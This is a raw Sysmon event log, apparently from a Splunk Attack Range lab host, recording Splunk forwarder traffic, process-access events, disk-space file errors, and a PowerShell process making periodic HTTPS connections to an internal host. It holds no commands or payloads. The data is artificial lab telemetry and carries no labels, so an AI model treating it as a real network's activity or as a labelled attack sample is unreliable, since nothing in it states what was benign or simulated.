13:17:20.853{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50521-false10.0.1.12-8000- 354300x800000000000000036497324Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:19.954{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50520-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497323Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:50.868{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E09931445631A2E9C29A692009C9F84C,SHA256=148A2BAB4174DBA5D6D3193A77073E566412F82D3F6CA05A9BB38CC9ADE0A2FB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497326Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:51.882{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF2F8911B203EC875250066AF724792E,SHA256=58318445C578E892CF457F5DA212B1DD32D970BB7E7440D39B52CD1712F5EFA9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497327Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:52.899{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9236D0DD6BFA7C161C35D39CF152008F,SHA256=B1FECFD973FF4CF3950C909FCD0C88591EA127D3A47938930521D07738729926,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497328Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:53.975{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7B4C4B2018D612AFDEE762FEB6359FA,SHA256=B67717448FC74136A75BB67BF516FCAB7FE0BA391B50B78D046CF53D6DE96B8A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497330Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:54.989{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BA13CF209093C6F530A2022595D3C73,SHA256=CA3232791173E9E9897D4E3DF059E40F5AE190CBBF4A97EFBEFD5C5DF691D36D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497329Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:54.359{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=4EE17B92B352FA64D85738F12BBB0FB0,SHA256=7743E2B9C76471603230C7C1117B2496991E49E3EAE9EAE516F3B497E437A719,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497331Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:25.002{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50522-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497332Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:56.008{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C05B5CD7C5B55CD5237E3DD9D1D08A3,SHA256=AB034C4457808368835F7F7F3717C5D3AFCB0BFDEFFDCF7C25CFE4E3C25D7C5A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497334Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:26.888{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50523-false10.0.1.12-8000- 23542300x800000000000000036497333Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:57.025{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0E2C28CA6543E9D96AA6C199E61CBC5,SHA256=4081AA4B328285626B164CDD25FF8193A3EE3D98351CE02848AA700F097E8B5E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497335Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:58.104{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3DBBFEF8F938B758C051585F70E03AFA,SHA256=D0644A3D16400CBC3EF56510CC69F79A00BA43A1D0A5E1F347F9913E9962E9BC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497337Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:59.369{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=3B80825DB216CC7B24D227556468BBF6,SHA256=6FF54087268FCEC1A2EE141ADFAAB25FB99FD0F2415BEFD162AABB826B7885E1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497336Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:59.154{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=103F5FBF87A0EC00D5086C20B27168EE,SHA256=2A03B6DDF11DBC8B03EA763551821EA9DDC16EA8ED6B4CECF7EC2BCF9859053B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497339Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:00.169{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D18ED8533F69CF9153BAEA96EF4BF1F,SHA256=0732D50135EB64DE99520DBA7AD4619291711D2AD7DF62651CCD18A7EBE1961E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497338Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:30.007{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50524-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497340Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:01.184{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36016D747D362B1325EEB0B3E81D1AC8,SHA256=815D1C3B9B9722063E1E40565A8D64C58D5F2EE02B6FF082463F6CA34D1B8794,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497341Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:02.220{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD493E58C0C506F94F19A1E3CBFBA96D,SHA256=7632CDE0532AE00B9BFB0229EA472DAE142C0B3FA9649C9831926E7063C6861B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497343Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:03.236{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=590BD08DB00EE8744B9541BFD74780E4,SHA256=78DAE76DAC4031567300DBE0DA56F6315868E889A57365973DCA71934F0E4F0B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497342Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:32.905{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50525-false10.0.1.12-8000- 23542300x800000000000000036497345Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:04.435{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=A9C8BC02F5DD471FF97966390A6AD867,SHA256=39065B3171B3754A42A3F9E108740D6BD208F7D878E13F5BF1B1CCE3747EBCB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497344Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:04.282{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A6351C85D097195FE2B218861FF8272C,SHA256=DA9F24D2F7545F5D70D3DAADC458B5C55E53ACD43D040419540CF7736DBA4C04,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497347Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:35.020{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50526-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497346Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:05.299{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=447B8A5D685F2978E159F4000947E46A,SHA256=C14919BF426472C06F161B8475111AB97F6C9F43CE6F69C6C3ECFFB005FCF740,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497348Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:06.317{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=900BA948AF60AF13E78BCFE3CD7E1E1D,SHA256=634F97EB8CB9037DF80F7E43BC354A15B1BB63835BA9269CF02DCC63F5C70D79,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497358Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:07.931{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A0D3-6140-7F56-04000000C801}3380C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497357Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:07.931{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497356Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:07.931{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497355Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:07.931{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497354Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:07.931{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497353Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:07.931{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-A0D3-6140-7F56-04000000C801}3380C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036497352Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:07.931{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A0D3-6140-7F56-04000000C801}3380C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036497351Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:07.917{B81B27B7-A0D3-6140-7F56-04000000C801}3380C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000036497350Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:37.916{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50527-false10.0.1.12-8000- 23542300x800000000000000036497349Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:07.400{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D28CFADCDC9234A9DFACB5EA23249BBA,SHA256=7A0E92F3D7BB06393D335C62539058B01114CBDE2F0BCA38FE08DB5558902DAA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497369Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:08.630{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A0D4-6140-8056-04000000C801}4572C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497368Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:08.630{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497367Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:08.630{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497366Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:08.630{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497365Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:08.630{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497364Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:08.630{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-A0D4-6140-8056-04000000C801}4572C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036497363Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 